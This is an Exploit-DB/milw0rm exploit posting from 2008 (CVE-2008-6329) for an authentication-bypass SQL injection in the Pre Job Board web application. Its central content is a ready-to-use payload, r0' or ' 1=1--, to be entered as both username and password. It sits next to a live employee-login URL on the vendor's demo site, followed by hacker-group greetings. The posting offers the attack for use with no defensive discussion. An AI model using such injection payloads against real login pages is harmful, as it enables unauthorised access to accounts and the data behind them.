Pre Job Board Auth Bypass Remote SQL Injection Vulnerability

2008-11-19T00:00:00
ID EDB-ID:7164
Type exploitdb
Reporter R3d-D3V!L
Modified 2008-11-19T00:00:00

Description

Pre Job Board (Auth Bypass) Remote SQL Injection Vulnerability. CVE-2008-6329. Webapps exploit for php platform

                                        
                                            [~] ----------------------------بسم الله الرحمن الرحيم------------------------------ 
[~]Tybe: (Auth Bypass) SQL Injection Vulnerability 

[~]Vendor:http://www.preproject.com/preaspjobboard.asp

[~]Software: PRE JOB BOARD

[~]author: R3d-D3v!L 

[~] Date: 21.11.2008 

[~] Home: www.ahacker.biz 

[~] contact: N/A 
[~] ----------------------------------------------------------- 


[~] Exploit: 

username: r0' or ' 1=1-- 
password: r0' or ' 1=1-- 


[~] login for demo: 

http://preproject.com/preaspjobboard//Employee/emp_login.asp


[~]-------------------------------------------------------------------------------- 
[~] Greetz tO: keta & m4n0n & maxmos & 8orn 2 K!LL & hesham_hacker 
[~] 
[~]spechial thanks : dolly & 7am3m & عماد ,الزهيري 
[~] 
[~] EV!L !NS!D3 734M ---> R3d-D3v!L--EXOT!C --poison scorbion 
[~] 
[~] & xp10.biz & ahacker.biz
[~] 
[~]--------------------------------------------------------------------------------



# milw0rm.com [2008-11-19]